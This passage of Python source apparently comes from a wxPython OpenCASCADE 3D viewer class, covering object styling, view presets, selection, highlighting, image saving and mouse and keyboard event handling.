See also:\n # /fixme https://tracker.dev.opencascade.org/view.php?id=27716\n if transparency: # filters out None and 0.0\n if transparency is UNSET:\n context.UnsetTransparency(obj, False)\n else:\n context.SetTransparency(obj, transparency, False)\n\n if line_thickness is not None:\n if line_thickness is UNSET:\n context.UnsetWidth(obj, False)\n else:\n context.SetWidth(obj, line_thickness, False)\n\n if display_mode is not None:\n if display_mode is UNSET:\n context.UnsetDisplayMode(obj, False)\n else:\n mode = self.py_DisplayMode[display_mode]\n context.SetDisplayMode(obj, mode, False)\n\n if deviation_coefficient is not None:\n if deviation_coefficient is UNSET:\n deviation_coefficient = self._DEFAULT_DEVIATION_COEFFICIENT\n elif deviation_coefficient < 1.0e-5:\n msg = (\"a deviation_coefficient of {:} is very small, \"\n \"expect delays...\")\n self.logger.warning(msg.format(deviation_coefficient))\n # display_context.SetDeviationAngle(h_AIS_InteractiveObject,\n # deflection, False)\n context.SetDeviationCoefficient(obj, deviation_coefficient,\n False)\n\n if u_isos is not None or v_isos is not None:\n drawer = obj.Attributes()\n \"\"\":type: OCC.Prs3d.Handle_Prs3d_Drawer\"\"\"\n\n for num_isos, set_iso in ((u_isos, drawer.SetUIsoAspect),\n (v_isos, drawer.SetVIsoAspect)):\n if num_isos is not None:\n iso_aspect = self._new_isoaspect(\n num_lines=0 if num_isos is UNSET else num_isos)\n set_iso(iso_aspect)\n redisplay = True\n\n # TODO (TBD): No obvious \"UNSET\" possible for display priority.\n # /todo Setting a display priority modifies the display priority\n # /todo for all its children.\n if display_priority is not None:\n if display_priority is UNSET:\n msg = (\"Unsetting the display priority is currently not \"\n \"supported. Nothing will happen.\")\n self.logger.warning(msg)\n else:\n context.SetDisplayPriority(obj, display_priority)\n\n if redisplay:\n self._ais_context.Redisplay(obj, update, False) # all_modes=False?\n elif update:\n self.update()\n\n def _new_isoaspect(self, color=Quantity_NOC_GRAY75,\n line_type=Aspect_TOL_SOLID,\n line_width=0.5,\n num_lines=0):\n quantity_color = Quantity_Color(color)\n return Prs3d_IsoAspect(quantity_color, line_type, line_width,\n num_lines).handle\n\n def reset_style(self, obj, update=True):\n \"\"\"Reset style of Handle_AIS_InteractiveObject ``obj``.\n\n :type obj: OCC.AIS.Handle_AIS_InteractiveObject\n \"\"\"\n priority = self.DEFAULT_DISPLAY_PRIORITY\n context = self._ais_context\n obj.UnsetAttributes()\n context.SetDisplayPriority(obj, priority)\n context.Redisplay(obj, update, False) # all_modes=False?\n\n def get_style(self, obj):\n \"\"\"Return dict with all kwargs from apply_style():\n\n {'color': (198, 145, 29),\n 'transparency': 0.0,\n 'line_thickness': 1,\n 'deviation_coefficient': 0.001,\n 'display_mode': 'shaded',\n 'display_priority': 5,\n 'u_isos': 0,\n 'v_isos': 0}\n\n :rtype: dict[str, T]\n \"\"\"\n dct = {}\n context = self._ais_context\n drawer = obj.Attributes()\n\n color = Quantity_Color()\n context.Color(obj, color)\n\n dct['color'] = QuantityColor_rgb(color)\n dct['transparency'] = obj.Transparency()\n dct['line_thickness'] = obj.Width() or 1.0\n # FIXME (PP): AIS_InteractiveObject.DisplayMode missing.\n # dct['display_mode'] = self.DisplayMode_py[obj.DisplayMode()]\n\n if obj.DynamicType().Name() == \"AIS_Shape\":\n # downcast to AIS_Shape, otherwise it does not have\n # OwnDeviationCoefficient\n shape_obj = Handle_AIS_Shape(obj)\n assert not shape_obj.IsNull() # casting should be a success\n else:\n shape_obj = 
obj\n\n try:\n meth = shape_obj.OwnDeviationCoefficient\n except AttributeError:\n dct['deviation_coefficient'] = context.DeviationCoefficient()\n else:\n flag, coef, prev_coef = meth()\n if flag:\n dct['deviation_coefficient'] = coef\n else:\n dct['deviation_coefficient'] = context.DeviationCoefficient()\n\n if obj.HasDisplayMode():\n display_mode = obj.DisplayMode()\n else:\n display_mode = context.DisplayMode()\n dct['display_mode'] = self.DisplayMode_py[display_mode]\n dct['display_priority'] = context.DisplayPriority(obj)\n dct['u_isos'] = drawer.UIsoAspect().Number()\n dct['v_isos'] = drawer.VIsoAspect().Number()\n\n return dct\n\n # X+ side\n def view_right(self, fit=True):\n self._set_view(V3d_Xpos, fit=fit)\n\n # X- side\n def view_left(self, fit=True):\n self._set_view(V3d_Xneg, fit=fit)\n\n # Y- side\n def view_front(self, fit=True):\n self._set_view(V3d_Yneg, fit=fit)\n\n # Y+ side\n def view_back(self, fit=True):\n self._set_view(V3d_Ypos, fit=fit)\n\n # Z+ side\n def view_top(self, fit=True):\n self._set_view(V3d_Zpos, fit=fit)\n\n # Z- side\n def view_bottom(self, fit=True):\n self._set_view(V3d_Zneg, fit=fit)\n\n # isometric view\n def view_iso(self, fit=True):\n self._set_view(V3d_XposYposZpos, fit=fit)\n\n def _set_view(self, v3d_orientation, fit=True):\n self._v3d_view.SetProj(v3d_orientation)\n if fit:\n self.fit_all()\n\n def remove_clipplanes(self):\n for pln in self._clipplanes:\n self._v3d_view.RemoveClipPlane(pln)\n\n def add_clipplane(self, point, direction):\n \"\"\"Example: ``add_clipplane((0, 0, 0), (0, 0, 1))``.\n\n :type point: (float, float, float)\n :type direction: (float, float, float)\n \"\"\"\n pln = gp_Pln(gp_Pnt(*point), gp_Dir(*direction))\n pln = Graphic3d_ClipPlane(pln).handle\n self._v3d_view.AddClipPlane(pln)\n self._clipplanes.append(pln)\n\n def select(self, obj, shift=False, update=True):\n \"\"\"Select ``obj`` and highlight it in viewer (if displayed).\n\n :param OCC.AIS.AIS_InteractiveObject obj: object to select\n :param bool shift: If set to `True`, appends `obj` to the\n current selection (unless it was already selected, in which case\n the object is deselected). If set to `False`, `obj` will be\n selected and all previously selected items will be deselected.\n :param bool update: update the viewer?\n \"\"\"\n context = self._ais_context\n if shift:\n context.AddOrRemoveSelected(obj, update)\n else:\n # we need to clear selected because SetSelected ADDS objects\n # to the selection for this specific overload\n context.ClearSelected(False)\n context.SetSelected(obj, update)\n\n def update_selected(self, update=True):\n \"\"\"Syncs the selection-highlighting with the actual state of what is\n selected/unselected in the viewer. Sometimes this can get out of\n sync by adding new items to the selection, or removing the\n highlighting of items.\n \"\"\"\n self._ais_context.UpdateSelected(update)\n\n def deselect(self, obj, update=True):\n context = self._ais_context\n if context.IsSelected(obj):\n context.AddOrRemoveSelected(obj, update)\n\n def select_under_mouse(self, pos, shift=False, update=True):\n \"\"\"Select the object under the current mouse position, if any. If\n ``shift`` is True, adds the object under the mouse to\n :attr:`selected_objects`; if it was already selected, it will be\n removed from :attr:`selected_objects`. 
If ``update``, viewer will be updated to\n show the object as selected.\n\n :param tuple[float, float] pos: mouse position x, y\n :param bool shift: shift-selection\n :param bool update: update viewer after selection.\n :rtype: AIS_StatusOfPick\n \"\"\"\n # Forcefully refresh detected. It might be that some things were\n # erased, but we did not move. Then the erased objects\n # are still in detected, causing a bug, for instance with double\n # erases, or ghost-selections.\n x, y = pos\n ais_context = self._ais_context\n self.move_to(x, y)\n\n if shift:\n return ais_context.ShiftSelect(update)\n else:\n return ais_context.Select(update)\n\n def select_area(self, x1, y1, x2, y2, shift=False, update=True):\n \"\"\"Select all object(s) that are fully inside the rectangle bound by\n top-left corner ``(x1, y1)`` and bottom-right corner ``(x2, y2)``. If\n ``shift`` is True, adds the current selection to\n :attr:`selected_objects`. Members inside the current selection that\n were already selected will be removed from :attr:`selected_objects`.\n If ``update``, viewer will be updated to show objects as selected.\n\n :param bool shift: shift-selection\n :param bool update: update viewer after selection.\n :rtype: AIS_StatusOfPick\n \"\"\"\n if shift:\n return self._ais_context.ShiftSelect(x1, y1, x2, y2,\n self._v3d_view, update)\n else:\n return self._ais_context.Select(x1, y1, x2, y2,\n self._v3d_view, update)\n\n def is_selected(self, obj):\n return bool(self._ais_context.IsSelected(obj))\n\n def select_all(self, update=True):\n context = self._ais_context\n # segfaults...\n # context.DisplayActiveSensitive(self._v3d_view)\n for obj in self.yield_displayed():\n if not context.IsSelected(obj):\n context.AddOrRemoveSelected(obj, False)\n if update:\n self.update()\n\n def deselect_all(self, update=True):\n self._ais_context.ClearSelected(update)\n\n @property\n def detected(self):\n \"\"\"List all detected objects in viewer.\n\n :rtype: list[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n return list(self.yield_detected())\n\n @property\n def selected(self):\n \"\"\"List all selected objects in viewer.\n\n :rtype: list[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n return list(self.yield_selected())\n\n @property\n def nb_selected(self):\n \"\"\"Number of selected items.\n\n A faster alternative to `len(viewer.selected)`, although it will still\n loop over all the elements (on C++ side).\n \"\"\"\n return self._ais_context.NbSelected()\n\n @property\n def displayed(self):\n \"\"\"List all displayed objects in viewer.\n\n :rtype: list[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n return list(self.yield_displayed())\n\n @concurrency_guard(\"detected\")\n def yield_detected(self):\n \"\"\"Yield currently detected objects in viewer.\n\n :rtype: collections.Iterable[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n context = self._ais_context\n context.InitDetected() # supports only iteration being active at once\n while context.MoreDetected():\n # DetectedInteractive seems to be broken and only returns the\n # topmost detected instance, hence the work-around below\n owner = context.DetectedCurrentOwner()\n selectable = owner.Selectable()\n ais = Handle_AIS_InteractiveObject.DownCast(selectable)\n if ais.IsNull():\n # Either the selectable wasn't an interactive object, or\n # the detected entity was Null itself. This shouldn't happen\n # but not 100% sure about that...\n self.logger.debug(f\"Cannot downcast detected selectable \"\n f\"to Handle_AIS_InteractiveObject! 
\"\n f\"owner: {owner!r}, \"\n f\"selectable: {selectable!r}.\")\n else:\n yield ais\n context.NextDetected()\n\n @concurrency_guard(\"detected\")\n def yield_detected_with_owner(self):\n \"\"\"Generate detected (currently under the cursor) shapes with the\n AIS object that owns them inside the :class:`Viewer`.\n\n Format::\n\n (shape, owner)\n (shape, owner)\n\n If the first element of the tuple is a shape, it is a sub-shape\n of the shape related to the owner (the second element of the tuple).\n\n When the detected entity does not have a shape, the first element\n of the tuple will be `None`, and one should look at the AIS object\n (the owner).\n\n :rtype: typing.Generator[typing.Tuple[typing.Union[OCC.wrapper.TopoDS.TopoDS_Shape, None], OCC.wrapper.AIS.Handle_AIS_InteractiveObject]]\n \"\"\"\n context = self._ais_context\n context.InitDetected() # supports only iteration being active at once\n while context.MoreDetected():\n select_owner = context.DetectedCurrentOwner()\n shape = self._get_selected_shape(select_owner)\n selectable = select_owner.Selectable()\n ais = Handle_AIS_InteractiveObject.DownCast(selectable)\n if ais.IsNull():\n # Either the selectable wasn't an interactive object, or\n # the detected entity was Null itself. This shouldn't happen\n # but not 100% sure about that...\n self.logger.debug(f\"Cannot downcast detected selectable \"\n f\"to Handle_AIS_InteractiveObject! \"\n f\"owner: {select_owner!r}, \"\n f\"selectable: {selectable!r}.\")\n else:\n yield shape, ais\n context.NextDetected()\n\n @property\n def detected_with_owner(self):\n \"\"\"Return a list of detected (currently under the cursor) shapes with\n the AIS object that owns them inside the :class:`Viewer`.\n\n Format::\n\n [(shape, owner), (shape, owner)]\n\n If the first element of the tuple is a shape, it is a sub-shape\n of the shape related to the owner (the second element of the tuple).\n\n When the detected entity does not have a shape, the first element\n of the tuple will be `None`, and one should look at the AIS object\n (the owner).\n\n :rtype: typing.List[typing.Tuple[typing.Union[OCC.wrapper.TopoDS.TopoDS_Shape, None], OCC.wrapper.AIS.Handle_AIS_InteractiveObject]]\n \"\"\"\n return list(self.yield_detected_with_owner())\n\n def yield_displayed(self):\n \"\"\"Yield currently displayed objects in viewer.\n\n :rtype: collections.Iterable[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n lst = AIS_ListOfInteractive()\n self._ais_context.DisplayedObjects(lst)\n for ais in lst:\n # ATTENTION: take another handle to own this reference,\n # AIS_ListOfInteractive will Nullify() original handle on gc\n yield Handle_AIS_InteractiveObject(ais)\n\n def yield_hidden(self):\n \"\"\"Yield currently hidden (erased) objects in viewer.\n\n :rtype: collections.Iterable[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n lst = AIS_ListOfInteractive()\n self._ais_context.ErasedObjects(lst)\n for ais in lst:\n # ATTENTION: take another handle to own this reference,\n # AIS_ListOfInteractive will Nullify() original handle on gc\n yield Handle_AIS_InteractiveObject(ais)\n\n def is_hidden(self, ais: Handle_AIS_InteractiveObject) -> bool:\n \"\"\"Return `True` if `ais` is `in_viewer` and hidden. 
\"\"\"\n return self._ais_context.DisplayStatus(ais) == AIS_DS_Erased\n\n def in_viewer(self, ais: Handle_AIS_InteractiveObject) -> bool:\n \"\"\"Return `True` if `ais` is in a way (hidden/displayed/\n temporarily) in the Viewer.\n \"\"\"\n return self._ais_context.DisplayStatus(ais) != AIS_DS_None\n\n @concurrency_guard(\"selected\")\n def yield_selected(self):\n \"\"\"Yield currently selected objects in viewer.\n\n :rtype: collections.Iterable[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n context = self._ais_context\n context.InitSelected() # supports only iteration being active at once\n while context.MoreSelected():\n yield context.SelectedInteractive()\n context.NextSelected()\n\n def _get_selected_shape(\n self, select_owner: \"OCC.wrapper.SelectMgr.SelectMgr_EntityOwner\"):\n brep_owner = Handle_StdSelect_BRepOwner.DownCast(select_owner)\n if brep_owner.IsNull(): # not a BRepOwner, so it does not have a shape\n msg = (f\"Could not retrieve the selected shape! \"\n f\"Selected owner is not a BRepOwner. selected \"\n f\"owner: {select_owner!r}. Object: {self!r}\")\n self.logger.warning(msg)\n elif not brep_owner.HasShape():\n msg = (f\"Could not retrieve the selected shape! \"\n f\"Selected owner does not have a shape: \"\n f\"{brep_owner!r}. Object: {self!r}\")\n self.logger.warning(msg)\n else:\n return brep_owner.Shape()\n\n return None\n\n @concurrency_guard(\"selected\")\n def yield_selected_with_owner(self):\n \"\"\"Generate a list selected shapes with the AIS object that owns\n them inside the :class:`Viewer`.\n\n Format::\n\n (shape, owner)\n (shape, owner)\n\n If the first element of the tuple is a shape, it is a sub-shape\n of the shape related to the owner (the second element of the tuple).\n\n When the selected entity does not have a shape, the first element\n of the tuple will be `None`, and one should look at the AIS object\n (the owner).\n\n :rtype: typing.Generator[typing.Tuple[typing.Union[OCC.wrapper.TopoDS.TopoDS_Shape, None], OCC.wrapper.AIS.Handle_AIS_InteractiveObject]]\n \"\"\"\n context = self._ais_context\n context.InitSelected() # supports only iteration being active at once\n while context.MoreSelected():\n select_owner = context.SelectedOwner()\n shape = self._get_selected_shape(select_owner)\n owner = context.SelectedInteractive()\n yield shape, owner\n context.NextSelected()\n\n @property\n def selected_with_owner(self):\n \"\"\"Return a list of selected shapes with the AIS object that owns\n them inside the :class:`Viewer`.\n\n Format::\n\n [(shape, owner), (shape, owner)]\n\n If the first element of the tuple is a shape, it is a sub-shape\n of the shape related to the owner (the second element of the tuple).\n\n When the selected entity does not have a shape, the first element\n of the tuple will be `None`, and one should look at the AIS object\n (the owner).\n\n :rtype: typing.List[typing.Tuple[typing.Union[OCC.wrapper.TopoDS.TopoDS_Shape, None], OCC.wrapper.AIS.Handle_AIS_InteractiveObject]]\n \"\"\"\n return list(self.yield_selected_with_owner())\n\n def is_displayed(self, obj):\n \"\"\"Returns true if ``obj`` is currently displayed.\n\n :param OCC.AIS.AIS_InteractiveObject obj: object to test\n :rtype: bool\n \"\"\"\n return self._ais_context.IsDisplayed(obj)\n\n def zoom(self, factor):\n \"\"\"Zoom by ``factor``:\n\n - Zoom out: 0 < factor < 1.\n - Zoom in: 1 < factor.\n\n :param float factor: 0 < factor\n \"\"\"\n self._v3d_view.SetZoom(factor)\n\n def fit_window(self, x1, y1, x2, y2):\n \"\"\"Fit window between pixels.\"\"\"\n 
self._v3d_view.WindowFit(x1, y1, x2, y2)\n\n def is_highlighted(self, obj):\n return self._ais_context.IsHilighted(obj)\n\n def highlight(self, obj, color=None, fill_color=None,\n display_mode=None, ensure_visible=False, update=True):\n \"\"\"Highlight ``obj``, optionally with ``color``, in the viewer.\n\n Return `True` if the object was indeed highlighted, `False` otherwise.\n\n :param OCC.AIS.AIS_InteractiveObject obj: object to highlight\n :param str|(int, int, int)|int|None color: highlight color\n :param str|(int, int, int)|int|None fill_color: Color the face\n should get (does not work with an edges-only `display_mode`\n like `wireframe`)\n :param str display_mode: How should the object be displayed on\n highlighting? In addition to 'wireframe' and 'shaded', there is\n also a 'default' display mode which defaults to the currently\n active Viewer display_mode. (Default: `None` which implies\n 'wireframe')\n :param bool ensure_visible: If set to `True` makes sure that the\n shape is displayed in the viewer.\n :param bool update: update viewer?\n :rtype: bool\n \"\"\"\n if not self.is_displayed(obj): # hidden OR not in_viewer\n if ensure_visible:\n self.display(obj, update=False, fit=False)\n else:\n return False # highlighting non-displayed items segfaults\n\n if (color is not None or fill_color is not None or\n display_mode is not None):\n style = Prs3d_Drawer().handle\n if color is not None:\n q_color = py_QuantityColor(color, str_default=None)\n style.SetColor(q_color)\n\n if fill_color is not None:\n fill_style = Graphic3d_AspectFillArea3d().handle\n fill_q_color = py_QuantityColor(fill_color, str_default=None)\n fill_style.SetInteriorColor(fill_q_color)\n\n style.SetBasicFillAreaAspect(fill_style)\n\n if display_mode is not None:\n if display_mode == \"default\":\n mode = -1\n else:\n mode = self.py_DisplayMode[display_mode]\n style.SetDisplayMode(mode)\n\n self._ais_context.HilightWithColor(obj, style, update)\n else:\n self._ais_context.Hilight(obj, update)\n\n return True\n\n def unhighlight(self, obj, update=True):\n \"\"\"Unhighlight a highlighted ``obj`` in the Viewer.\n\n :param OCC.wrapper.AIS.AIS_InteractiveObject obj: object\n to unhighlight.\n :param bool update: update viewer? 
(Default: `True`)\n :return: `True` if successful, `False` otherwise (probably the shape\n was not highlighted).\n :rtype: bool\n \"\"\"\n restore_hidden = False\n if not (self.in_viewer(obj) and self.is_highlighted(obj)):\n return False\n\n if self.is_hidden(obj):\n # it does not go well when unhighlighting a hidden shape so,\n # without updating, we show the shape, unhighlight it, and restore\n # the hidden state\n restore_hidden = True\n self.display(obj, update=False, fit=False)\n\n # if not restoring, we should update after this call\n context = self._ais_context\n context.Unhilight(obj, False)\n # unhighlight might remove 'selected' highlighting, restored by:\n context.UpdateSelected(update and not restore_hidden)\n\n if restore_hidden:\n # if restoring, we only should update at this point\n self.hide(obj, update=update and restore_hidden, fit=False)\n return True\n\n # FIXME (TBD): Doesn't work too well, some isolines still show, leaves\n # objects in wireframe display mode\n # FIXME no black border in shaded mode.\n def unhighlight_all(self, update=True):\n self._v3d_viewer.UnHighlight()\n if update:\n self.update()\n # self._ais_context.UnhilightSelected(update)\n # self._ais_context.UnhilightCurrents(update)\n\n def enable_highlighting(self):\n warnings.warn(\"enable_highlighting is deprecated, \"\n \"use enable_highlight_selected instead!\",\n OCCDeprecationWarning, stacklevel=2)\n self.enable_highlight_selected()\n\n def disable_highlighting(self):\n warnings.warn(\"disable_highlighting is deprecated, \"\n \"use disable_highlight_selected instead!\",\n OCCDeprecationWarning, stacklevel=2)\n self.disable_highlight_selected()\n\n def disable_highlight_selected(self):\n self._ais_context.SetToHilightSelected(False)\n\n def enable_highlight_selected(self):\n self._ais_context.SetToHilightSelected(True)\n\n def highlighting_selected_enabled(self):\n return self._ais_context.ToHilightSelected()\n\n def enable_automatic_highlighting(self):\n \"\"\"Enable the automatic highlighting feature `AutomaticHilight`.\"\"\"\n self._ais_context.SetAutomaticHilight(True)\n\n def disable_automatic_highlighting(self):\n \"\"\"Disable the automatic highlighting feature `AutomaticHilight`.\"\"\"\n self._ais_context.SetAutomaticHilight(False)\n\n def automatic_highlighting_enabled(self):\n \"\"\"This is, by default, enabled and will make sure that,\n for instance, shapes are highlighted when hovering over them.\n \"\"\"\n return self._ais_context.AutomaticHilight()\n\n def toggle_axes(self):\n if self.triedron:\n self._v3d_view.TriedronErase()\n else:\n self.init_triedron()\n self.update()\n self.triedron = not self.triedron\n\n # TODO (RVD): test again once FreeImage and Gl2PS libraries are present\n # FIXME (TBD): investigate why bitmap images get corrupted\n def save_image(self, filename: str, width: int = None, height: int = None):\n \"\"\"Dump the full contents of the view at the same scale in the\n file ``filename``. The file name extension must be one of\n 'gif', 'bmp', 'jpg', 'png', 'pgf', 'ps', 'emf', 'svg', 'eps', 'tex',\n 'pdf'. Returns False when the dump has failed.\n\n 
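A minimal call (the file name is illustrative)::\n\n viewer.save_image(\"snapshot.png\")\n\n :param filename: full pathname to image file.\n :param width: width of the image in pixels. Defaults to the width of\n the Viewer.\n :param height: height of the image in pixels. 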
Defaults to the height\n of the Viewer.\n :rtype: bool\n \"\"\"\n filename = os.path.abspath(filename)\n _, ext = os.path.splitext(filename)\n ext = ext[1:].lower()\n if ext in VALID_BITMAP_EXTENSIONS_SET:\n pixmap = Image_AlienPixMap()\n viewer_size = self.Size\n w = width or viewer_size[0]\n h = height or viewer_size[1]\n\n # Creating an image through ToPixMap seems to have more consistent\n # behaviour on Linux\n success = self._v3d_view.ToPixMap(pixmap, w, h)\n if success:\n ascii_filename = TCollection_AsciiString(filename)\n success = pixmap.Save(ascii_filename)\n\n # TODO (PP): uncomment when vector export is supported again\n # elif ext in VALID_VECTOR_EXTENSIONS_SET:\n # format = ext_Graphic3d_ExportFormat[ext]\n # TODO (RvD): Changing to _v3d_view at least gets grey stuff.\n # /todo Maybe it is not rendered using OpenGl? Or another\n # /todo or maybe just something very different...\n # success = self._graphic3d_cview.Export(str(filename), format)\n # success = self._v3d_view.Export(str(filename), format)\n else:\n msg = \"File extension '.{}' not supported. Choose one of {}.\"\n raise RuntimeError(msg.format(ext, VALID_IMAGE_EXTENSIONS))\n\n if success:\n print(\"Saved image to:\", os.path.abspath(filename))\n else:\n msg = \"Saving image failed. Requested location: '{}'.\"\n self.logger.warning(msg.format(filename))\n\n return success\n\n def _conform_selection_mode(self, mode: Union[str, int]) -> int:\n if isinstance(mode, str):\n try:\n return NAME_TO_SEL_MODE[mode]\n except KeyError:\n raise ValueError(f\"Unknown selection mode! Supported modes: \"\n f\"{sorted(NAME_TO_SEL_MODE.keys())}. \"\n f\"Object: {self!r}\")\n elif isinstance(mode, int):\n return mode\n else:\n raise TypeError(f\"Selection mode should be a str or an int! \"\n f\"Got: {type(mode)!r}. Object: {self!r}\")\n\n def activate_selection_mode(self, mode: Union[str, int] = \"default\",\n obj: \"Handle_AIS_InteractiveObject\" = None,\n force=False):\n \"\"\"Activate a (sub-shape) selection mode for one or all objects\n currently in the viewer. Multiple modes can be activated at the\n same time.\n\n When calling this method without arguments, it resets the viewer to\n the default setting.\n\n :param mode: A string ('vertices', 'edges', ...., 'compounds' or\n 'default') specifying the mode to be activated. Here\n 'default' is the normal 'whole shape' selection mode.\n Alternatively specify an int, which will correspond to how it\n works in opencascade.\n :param obj: Object to activate the selection mode on. When not set,\n it will apply the selection mode on all objects currently\n displayed in the viewer.\n :param force:\n \"\"\"\n sel_mode = self._conform_selection_mode(mode)\n args = [obj, sel_mode] if obj else [sel_mode]\n self._ais_context.Activate(*args, force)\n\n def deactivate_selection_mode(self, mode: Union[str, int] = None,\n obj: \"Handle_AIS_InteractiveObject\" = None):\n \"\"\"Deactivate a (sub-shape) selection mode for one or all objects\n currently in the viewer.\n\n When calling this method without arguments, it removes all selection\n modes, including the 'default' one, making all objects non-selectable.\n\n :param mode: A string ('vertices', 'edges', ...., 'compounds' or\n 'default') specifying the mode to be deactivated. Here\n 'default' is the normal 'whole shape' selection mode.\n Alternatively specify an int, which will correspond to how it\n works in opencascade.\n :param obj: Object to deactivate the selection mode on. 
When not set,\n it will deactivate the selection mode on all objects currently\n displayed in the viewer.\n \"\"\"\n args = [obj] if obj else []\n if mode is not None:\n sel_mode = self._conform_selection_mode(mode)\n args.append(sel_mode)\n self._ais_context.Deactivate(*args)\n\n def get_active_selection_modes(\n self, obj: \"Handle_AIS_InteractiveObject\") -> Set[str]:\n \"\"\"Get the selection modes currently active on `obj`.\n\n .. note:: Currently only returns the modes as the names used\n by activate/deactivate selection mode. Special modes not covered\n by these names, that would have been specified using integers,\n will appear as `None` in the end-results.\n \"\"\"\n modes = TColStd_ListOfInteger()\n self._ais_context.ActivatedModes(obj, modes)\n return set(map(SEL_MODE_TO_NAME.get, modes))\n\n def _mark_area(self, evt):\n x1_, y1_ = self._drag_x1_y1\n x2_, y2_ = evt.GetX(), evt.GetY()\n if x1_ <= x2_:\n x1, x2 = x1_, x2_\n else:\n x1, x2 = x2_, x1_\n if y1_ <= y2_:\n y1, y2 = y1_, y2_\n else:\n y1, y2 = y2_, y1_\n self._selected_area = (x1, y1, x2, y2)\n\n def _draw_rubberband(self):\n # use latency to not draw the rectangle too often\n t2 = time.time()\n t1 = self._drag_t1\n if t2 - t1 < self.LATENCY:\n return\n else:\n self._drag_t1 = t2\n\n x1, y1, x2, y2 = self._selected_area\n x, y, w, h = x1, y1, x2 - x1, y2 - y1\n\n # self.dc.Clear()\n self.update()\n\n self._dc.DrawLineList(((x, y, x + w, y),\n (x + w, y, x + w, y + h),\n (x + w, y + h, x, y + h),\n (x, y + h, x, y)))\n\n # transparent rectangle not working...\n # rect = wx.Rect(x, y, w, h)\n # self.dc.DrawRectangle(rect)\n\n # ---- event handlers ----\n def OnKeyW(self, evt):\n self.set_display_mode_wireframe()\n\n def OnKeyS(self, evt):\n self.set_display_mode_shaded()\n\n def OnKeyF(self, evt):\n self.fit_all()\n\n def OnKeyQ(self, evt):\n self.set_display_mode_hlr()\n\n def OnKeyC(self, evt):\n if evt.ShiftDown():\n self.display_all()\n else:\n self.hide_all()\n\n def OnKeyA(self, evt):\n if evt.ControlDown():\n self.select_all()\n\n def OnKeyDEL(self, evt):\n self.hide_selected_objects()\n\n def onKeyESC(self, evt):\n self.deselect_all()\n\n def _schedule(self, callback, *args, **kwargs):\n # make sure there's a running Wx app\n app = wx.GetApp() or wx.App()\n\n wx.CallAfter(callback, *args, **kwargs)\n\n def OnSize(self, evt):\n self._schedule(self._OnSize)\n\n def _OnSize(self):\n self._v3d_view.MustBeResized()\n\n def OnPaint(self, evt):\n self._schedule(self._OnPaint)\n\n def _OnPaint(self):\n self._v3d_view.Update()\n\n def OnKeyDown(self, evt):\n code = evt.GetKeyCode()\n try:\n call_me = self._keymap[code]\n except KeyError:\n pass\n else:\n call_me(evt)\n\n def OnLeftDown(self, evt):\n self.left_m_down = True\n self.leftIsUp = False\n self.SetFocus()\n self._dragged = False\n self._drag_x1_y1 = x, y = evt.GetX(), evt.GetY()\n if evt.ShiftDown():\n self._drag_t1 = time.time()\n else:\n self._v3d_view.StartRotation(x, y)\n\n def OnLeftUp(self, evt):\n self.left_m_down = False\n shift_down = evt.ShiftDown()\n\n status = None\n if not self._dragged: # pure click\n status = self.select_under_mouse(evt.Position, shift=shift_down)\n elif self._selected_area: # small motions can be filtered out\n # self.dc.Clear()\n x1, y1, x2, y2 = self._selected_area\n status = self.select_area(x1, y1, x2, y2, shift=shift_down)\n self._selected_area = None\n\n if status is not None:\n evt_pos = evt.GetPosition()\n # 1. 
pure left-click background\n if status is AIS_SOP_NothingSelected:\n if not self._dragged: # filter out dragging\n if not shift_down: # filter out shift left-click\n evt = create_left_click_background_event(\n evt_pos)\n wx.PostEvent(self, evt)\n else:\n # something was really clicked\n if self._ais_context.HasDetected():\n # 2. left-clicked something, single object selected\n if status is AIS_SOP_OneSelected:\n evt = create_left_click_object_event(\n evt_pos, self.yield_selected(), False)\n wx.PostEvent(self, evt)\n # 3. left-clicked something, multiple objects selected\n elif status is AIS_SOP_SeveralSelected:\n evt = create_left_click_object_event(\n evt_pos, self.yield_selected(), True)\n wx.PostEvent(self, evt)\n\n def OnMiddleDown(self, evt):\n self._dragged = False\n self._drag_x1_y1 = evt.GetX(), evt.GetY()\n\n def OnRightDown(self, evt):\n self.right_m_down = True\n self._dragged = False\n self._drag_x1_y1 = evt.GetX(), evt.GetY()\n if evt.ShiftDown():\n self._drag_t1 = time.time()\n else:\n self._selected_area = None\n\n def OnRightUp(self, evt):\n self.right_m_down = False\n if not self._dragged: # pure click\n evt_pos = evt.GetPosition()\n if self._ais_context.HasDetected(): # right-clicked something\n it_detected = self.yield_detected()\n topmost_detected = next(it_detected) # top-most object\n # 1. right-clicked already selected objects\n if self._ais_context.IsSelected(topmost_detected):\n # don't select again, see if there were multiple selected\n it_selected = self.yield_selected()\n first = next(it_selected)\n try:\n second = next(it_selected)\n except StopIteration:\n multiple = False\n it = itertools.chain((first,), it_selected)\n else:\n multiple = True\n it = itertools.chain((first, second), it_selected)\n evt = create_right_click_object_event(\n evt_pos, it, multiple)\n wx.PostEvent(self, evt)\n # 2. right-clicked object that isn't selected yet\n else:\n # shift is irrelevant\n status = self.select_under_mouse(evt.Position, shift=False)\n if status is not AIS_SOP_OneSelected:\n msg = (\"Expected to right-click a single object that \"\n \"wasn't already selected, but that didn't happen. \"\n \"Contact support@parapy.nl\")\n self.logger.warning(msg)\n else:\n evt = create_right_click_object_event(\n evt_pos, self.yield_selected(), False)\n wx.PostEvent(self, evt)\n # 3. right-clicked background\n else:\n # force clearing previous selection\n status = self.select_under_mouse(evt.Position, shift=False)\n if status is not AIS_SOP_NothingSelected:\n msg = (\"Expected to right-click background, but something \"\n \"was selected instead. 
